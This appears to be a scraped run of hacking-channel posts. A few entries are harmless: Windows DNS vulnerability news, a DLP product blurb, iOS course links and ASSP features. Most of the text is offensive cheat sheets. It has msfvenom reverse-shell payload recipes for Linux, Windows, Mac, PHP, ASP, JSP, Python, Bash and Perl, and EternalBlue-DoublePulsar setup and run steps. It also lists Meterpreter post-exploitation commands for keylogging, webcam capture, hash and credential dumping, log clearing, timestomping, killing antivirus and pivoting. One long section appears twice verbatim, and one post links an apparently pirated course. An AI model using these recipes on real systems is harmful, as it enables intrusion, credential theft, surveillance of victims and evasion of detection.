▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Microsoft warns of major vulnerabilities in Windows DNS server
#News

> Microsoft warned that the company listed a key vulnerability in a Windows DNS server 17 years ago as a "worm." Such vulnerabilities may allow attackers to create special malware, execute code remotely on Windows servers, and create malicious DNS queries, which may eventually lead to the intrusion of infrastructure in enterprises and key departments.

> Visit the MSRC report:

https://msrc-blog.microsoft.com/2020/07/14/july-2020-security-update-cve-2020-1350-vulnerability-in-windows-domain-name-system-dns-server/

> "Worm vulnerabilities can spread through vulnerable software through vulnerable software without user interaction," explains Mechele Gruhn, Microsoft's chief security project manager. "Windows DNS server is a core network component. Although it is not known whether this vulnerability is used for active attacks, customers must apply Windows updates as soon as possible to resolve this vulnerability."

> Researchers at Check Point discovered a security vulnerability in Windows DNS and reported it to Microsoft in May. If the patch is not applied, it will make the Windows server vulnerable to attacks, but Microsoft pointed out that there is no evidence of this flaw being used.

> Today, all supported versions of Windows Server provide patches to fix the vulnerability, but system administrators must patch the server as soon as possible before malicious actors create malware based on the vulnerability.

"DNS server vulnerability is a very serious matter," Omri Herscovici, the head of Check Point's vulnerability research team, warned. "Only a few of these types of vulnerabilities have been published. Every organization that uses Microsoft infrastructure, regardless of size, will face significant security risks if they do not apply patches. The worst consequence will be the complete destruction of the entire enterprise network. Microsoft's code has been in existence for more than 17 years; since we can find this vulnerability, it is not impossible for others to have discovered this vulnerability."

> Windows 10 and other client versions of Windows are not affected by this vulnerability, because it only affects Microsoft's Windows DNS Server implementation. Microsoft has also released a registry-based working method to prevent administrators from quickly addressing defects when they cannot quickly patch servers.

> Microsoft gave a maximum risk score of 10 on the Common Vulnerability Scoring System (CVSS), emphasizing the severity of the problem. In contrast, the vulnerability used in the WannaCry attack scored 8.5 on CVSS.

ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Computer Data Leakage Prevention System

WHAT IS Computer Data Leakage Prevention System ?

(download address: http://www.grabsun.com/monitorusb.html ) is an enterprise document security management system designed to protect computer files and prevent the disclosure of business secrets. The system can not only completely disable the use of U disks and USB storage devices, but also disable network disks, emails, FTP file uploads, and chat software to send files to disclose company commercial secrets. In addition, the system also integrates a series of computer usage management functions, which can effectively regulate the employee's computer network usage during work hours, which can not only further protect computer file security and network security, but also improve employee work efficiency and achieve network management The real purpose of the.

🦑The specific functions of Dashizhi Enterprise Data Anti-Leakage Software are as follows:

1. You can completely prohibit the use of U disks, mobile hard disks, SD cards, mobile phones to connect to computers, tablet computers and other devices with storage functions.

2. Completely disable the use of optical drives and floppy drives. At the same time, you can only prohibit the burning of optical drives and limit the use of burning optical drives without affecting the playback function of the optical drive.

3. Completely disable the computer COM port, prohibit the use of computer ports, prohibit the use of external devices such as printers.

4. Comprehensively protect the security of the operating system, prohibit the modification of the registry, prohibit the modification of group policies, prohibit the use of msconfig, prohibit entering the computer security mode, disable the use of the task manager, prohibit the use of the device manager, etc.

5. Comprehensively prevent employees from uninstalling, preventing accidental killing or interception by anti-virus software, protecting computer information security to the greatest extent, and protecting enterprise commercial secrets.

6. Allow network administrators to set blacklists that prohibit computers from running programs and whitelists of programs that are only allowed to run, blacklists of URLs that are not allowed to be accessed, and whitelists of URLs that are only allowed to be accessed, thereby enhancing the control of computer usage.

7. The functions of effectively prohibiting network hotspots, prohibiting 360 portable wifi, prohibiting Baidu portable wifi, shielding wifi sharing wizard, and prohibiting wifi master keys, preventing employees from using these portable wifi to provide Internet access for their laptops, mobile phones or tablets .

8. Added banned email sending, banned network disk upload, banned forum attachment upload, banned FTP upload, allowed only specific QQ number login, only allowed specific Aliwangwang account login, banned QQ sending files, banned QQ group shared file upload.

9. Exclusively supports both stand-alone installation and stand-alone management, as well as the management of the server and client based on the C/S architecture, thereby facilitating the user's use.

10. Personalized customization is available for users. All kinds of computer equipment and any configuration of the operating system are forbidden at any time to protect computer security and commercial secrets.


🦑Some guys here hate chineese tools, but anyway we post for learn only !
ENJOY❤️👍🏻
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑 FREE COURSES iOs by Apple developers :

1️⃣Face ID and your Apps
iOS
One of the most advanced features of iPhone X, Face ID is a secure biometric authentication technology that lets users easily unlock, authenticate, pay, and quickly access your app with just a glance. While it has many similarities to Touch ID, there are a few key differences. Learn more about...

2️⃣Configuring Your Developer Account for Apple Pay
iOS, MacOS
Apple Pay is the easy, secure, and private way to pay for physical goods and services within apps and websites. Find out how you can configure your Apple Developer Account to start using the Apple Pay APIs.

2️⃣Building Sticker Packs
iOS
Turn your artwork into a sticker pack for Messages on iOS 10. Learn how to bundle both images and animations into your sticker pack and test your finished result.

3️⃣Submitting an iMessage App or Sticker Pack - Part 1
iOS
Learn how to distribute your sticker pack on the App Store. Simply add your app to iTunes Connect and enter the required information, including description, keywords, and screenshots.


4️⃣Submitting an iMessage App or Sticker Pack - Part 2
iOS
Find out how to submit your sticker pack to App Review, the last step before your app can be distributed on the App Store.

> WATCH OR DOWNLOAD :
https://developer.apple.com/videos/tutorials

Enjoy❤️👍🏻
▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁


🦑The release of iOS APP is divided into two parts AB, first test the APP, if there is no problem, upload the APP to review!

Part A: The real machine debugging is introduced in 5 steps. If the real machine has been tested well, please directly drop down to see step B.

(Be sure to test the app first before putting it on the shelf, or if there are a bunch of bugs in the app, it will be reviewed but it will waste time)


1. Install Appuploader, an iOS auxiliary software
> http://www.applicationloader.net/appuploader/download.php

2. Log in to Appuploader to apply for iOS development certificate file p12

3. Log in to Appuploader to apply for iOS development certificate description file mobileprovision

4. Use the iOS certificate file to package the Apple APP

5. Install the packaged APP to the Apple mobile phone to test

Part B: App Store review is conducted in 6 steps.

1. Apply for iOS release certificate

2. Apply for iOS release description file

3. Pack ipa

4. iTunes Connect creates APP

5. Upload ipa

6. Set APP information submission for review

@iUndercode
▁ ▂ ▄ iU𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 Create a CRUD Contacts Database App with Python and SQLite —1 GB—

https://www.udemy.com/course/create-a-crud-contacts-database-app-with-python-and-sqlite/

https://mega.nz/folder/2V5nnRRB#ENNrkw87fcPnm5dNuGZRRw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑2020 TOPIC HACKING-PENTESTING
F E A T U R E S :

Multiple Weighted DNSBLs
Multiple Weighted URIBLs
Greylisting
Weighted Regular Expression Filtering
Bayesian
Penalty Box
SenderBase
SSL/TLS
SPF/SRS
Attachment Blocking
ClamAV and FileScan
Blocking Reporting
LDAP support
Backscatter Detection
recipient replacement / GUI user access rights management
MIME charset conversion / DKIM check and signing
multi DB support for all hashes / level based open plugin support
transparent TCP proxy support
Plugins: archive, full attachment check and replacement, OCR
damping (steal spammers time)
AUTH to relay host / POP3 collector
configuration value and file synchronization
Block Reports design could be customized
Razor2 and DCC support using Plugin
SNMP support (monitoring, configuring, controll-API)
user group import (file or LDAP or command based)
automatic crash analyzer Hidden Markov Model
IPv6 socket support
word stemming (several languages) for Bayesian analyzer
Perl module autoupdate via PPM or CPAN
Hidden Markov Model spam detection engine
full unicode support
DMARC support
privat Whitelist (legacy, domain based, user based)
privat IP and Domain lists (legacy, domain based, user based)
CPU affinity settings
web file commander
graphical statistic output (SVG)
native SSL support for target hosts
client SSL-certificate validation
privat SMIME signing
corporate SMIME signing, using a single privat certificate
content based executable attachment blocking
content based compressed attachment blocking
BATV check and signing
Message-ID signing and check FBMTV
remote support
Authenticated Received Chain (ARC) processing and signing
RSS feeds for blocked emails using Plugin
zero day virus detection
VirusTotal API

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open source platform-independent SMTP Proxy server which implements auto-whitelists, self learning Hidden-Markov-Model and/or Bayesian, Greylisting, DNSBL, DNSWL, URIBL, SPF, SRS, Backscatter, Virus scanning, attachment blocking, Senderbase and multiple other filter methods. Click 'Files' to download the professional version 2.6.3 build 20002.
A linux(ubuntu 18.04 LTS) and a freeBSD 11.2 based ready to run OVA of ASSP V2 are also available for download.

> DOWNLOAD :

> https://sourceforge.net/projects/assp/files/latest/download

enjoy❤️👍🏻
✅Topic 2020 sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Mobile Application Test Notes (Android)

Prepping the application
(After Android Nougat, Apps need to repackaged since they don't trust user certificates by default)
- https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html

+ apktool d <path of the .apk file>
+ Update AndroidManifest.xml
- Add android:networkSecurityConfig="@xml/networksecurityconfig" to application tag in xml
+ Add networksecurityconfig.xml to res/xml folder
- "Trusting user-added CAs for all secure connections" section in
https://android-developers.googleblog.com/2016/07/changes-to-trusted-certificate.html
+ Repackage the application
- apktool b unpackedapkfolder -o <output path to new apk file>
+ Signing the application
- Create a keystore using keytool
- jarsigner -keystore <path to your keystore> -storepass <password> -keypass <password> <path to apk> android

Creating an emulator and installing the application

+ Create a virtual device:
- android avd

+ Start the emulator:
- emulator –avd testavd

+ Install the application:
- adb install <path of the .apk file>

+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.

+ Start the emulator and proxy:
- emulator –avd testavd –http-proxy http://localhost:8080

+ Download and install burp certificate (.crt) onto the emulator using the push shell command.


Notes:

+ Application file type - x.apk

Install Certs: http://www.realmb.com/droidCert/
SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp

http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Mobile Application Test Notes (iPhone)


Prepping Device and Application:

+ Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04
+ Enable SSH on iPhone/iPad
+ Install iFunbox to install the application (http://www.i-funbox.com)
+ Connect device to lab wireless network
+ Add web proxy settings - IP address of attacking machine port 8080
+ Ensure connection and SSH is working


Prepping Burp Suite:

+ Open Burp Suite and navigate to Proxy->Options,
- Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’.

+ Download and install burp certificate (.crt) onto ipad.

Mobile Application Penetration Testing:

+ Browse the following Directory for insecure storage
- /private/var/mobile/applications/


Notes:

+ Application file type - x.ipa

+ Easy way:

- Place attacking machine and apple device on wireless network with app installed.
- Email burps .cer to apple device and install
- Start burp and disable firewall on listening machine.
- Change proxy settings on apple device to point to listening burp machine/port.

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑METASPLOIT
#FastTips

Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.

Metasploit
MetaSploit requires Postfresql
systemctl start postgresql

To enable Postgresql on startup
systemctl enable postgresql

MSF Syntax
Start metasploit
msfconsole
msfconsole -q


Show help for command
show -h


Show Auxiliary modules
show auxiliary


Use a module
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass


Show the basic information for a module
info


Show the configuration parameters for a module
show options


Set options for a module
set RHOSTS 192.168.1.1-254
set THREADS 10


Run the module
run


Execute an Exploit
exploit


Search for a module
search type:auxiliary login


Metasploit Database Access
Show all hosts discovered in the MSF database
hosts


Scan for hosts and store them in the MSF database
db_nmap


Search machines for specific ports in MSF database
services -p 443


Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts


You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI


1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run



####Experimenting with Meterpreter####

Get system information from Meterpreter Shell
sysinfo

Get user id from Meterpreter Shell
getuid

Search for a file
search -f *pass*.txt

Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell
shell

Exit the meterpreter shell
exit

Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter

payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/


Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb


Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
- download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR BEGINERS :
+ Creating Metasploit Payloads

List payloads
msfvenom -l

Binaries

Linux
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


Web Payloads

PHP
msfvenom -p php/meterpreterreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jspshellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war


Scripting Payloads

Python
msfvenom -p cmd/unix/reversepython LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reversebash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverseperl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl


Shellcode

For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
msfvenom -p windows/meterpreter/reversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>


Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑METASPLOIT
#FastTips

Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.

Metasploit
MetaSploit requires Postfresql
systemctl start postgresql

To enable Postgresql on startup
systemctl enable postgresql

MSF Syntax
Start metasploit
msfconsole
msfconsole -q


Show help for command
show -h


Show Auxiliary modules
show auxiliary


Use a module
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass


Show the basic information for a module
info


Show the configuration parameters for a module
show options


Set options for a module
set RHOSTS 192.168.1.1-254
set THREADS 10


Run the module
run


Execute an Exploit
exploit


Search for a module
search type:auxiliary login


Metasploit Database Access
Show all hosts discovered in the MSF database
hosts


Scan for hosts and store them in the MSF database
db_nmap


Search machines for specific ports in MSF database
services -p 443


Leverage MSF database to scan SMB ports (auto-completed rhosts)
services -p 443 --rhosts


You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
https://www.youtube.com/watch?v=4OHLor9VaRI


1. First step is to configure the Kali to work with wine 32bit

dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit

2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb

4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)

use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run



####Experimenting with Meterpreter####

Get system information from Meterpreter Shell
sysinfo

Get user id from Meterpreter Shell
getuid

Search for a file
search -f *pass*.txt

Upload a file
upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec

Download a file
download c:\\Windows\\system32\\calc.exe /tmp/calc.exe

Invoke a command shell from Meterpreter Shell
shell

Exit the meterpreter shell
exit

Metasploit Exploit Multi Handler
multi/handler to accept an incoming reverse_https_meterpreter

payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/


Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rb


Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
- download Download a file or directory
upload Upload a file or directory
portfwd Forward a local port to a remote service
route View and modify the routing table
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
record_mic Record audio from the default microphone for X seconds
webcam_snap Take a snapshot from the specified webcam
getsystem Attempt to elevate your privilege to that of local system.
hashdump Dumps the contents of the SAM database

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Materpreter Study Notes

# Baisc system commands

background # placed in the background of the current session

Sessions # Sessions to see -h help

sessions -i <ID value> # kill -k session into the session

bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts


info # View existing module information

getuid # View current user identity

getprivs # View current user permissions

getpid # Get current process ID (PID)

sysinfo # View target machine system information

irb # Open ruby terminal

ps # View is running Process

kill <PID value> # Kill the specified PID process

idletime # View target idle time

reboot / shutdown # Restart / Shutdown

shell # Enter target cmd shell

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Helpful Commands for any hacker:


# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard

# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe

# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process

# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows

# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time

# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password


# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389

# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run

ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑# Common script :

Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan

run winenum # automate some detection scripts

run credcollect # get user hash

run domainlistgen # get domain management account list

run post/multi/gather/env # get User environment variable

run post/windows/gather/enumloggedonusers -c # List current login user

run post/linux/gather/checkvm # virtual machine

run post/windows/gather/checkvm # virtual machine

run post/windows/gather/ Forensics/enumdrives # View memory information

run post/windows/gather/enumapplications # Get installation
software information

run post/windows/gather/dumplinks # Get recently accessed documents, link information

run post/windows/gather/enumie # Get IE cache

run post/windows/gather/enumfirefox # Get firefox cache

run post/windows/gather/enumchrome # Get Chrome cache

run post/multi/recon/localexploitsuggester # Get local privilege vulnerability

run post/windows/gather/enumpatches # Get patch information

run post/windows/gather/enumdomain # Find domain control

run post/windows/gather/enumsnmp # Get snmp community name

run post/windows/gather/credentials/vnc # Get vnc password

run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password

run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot

run post/windows/manage/killav close antivirus software


ENJOY❤️👍🏻
✅git sources
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁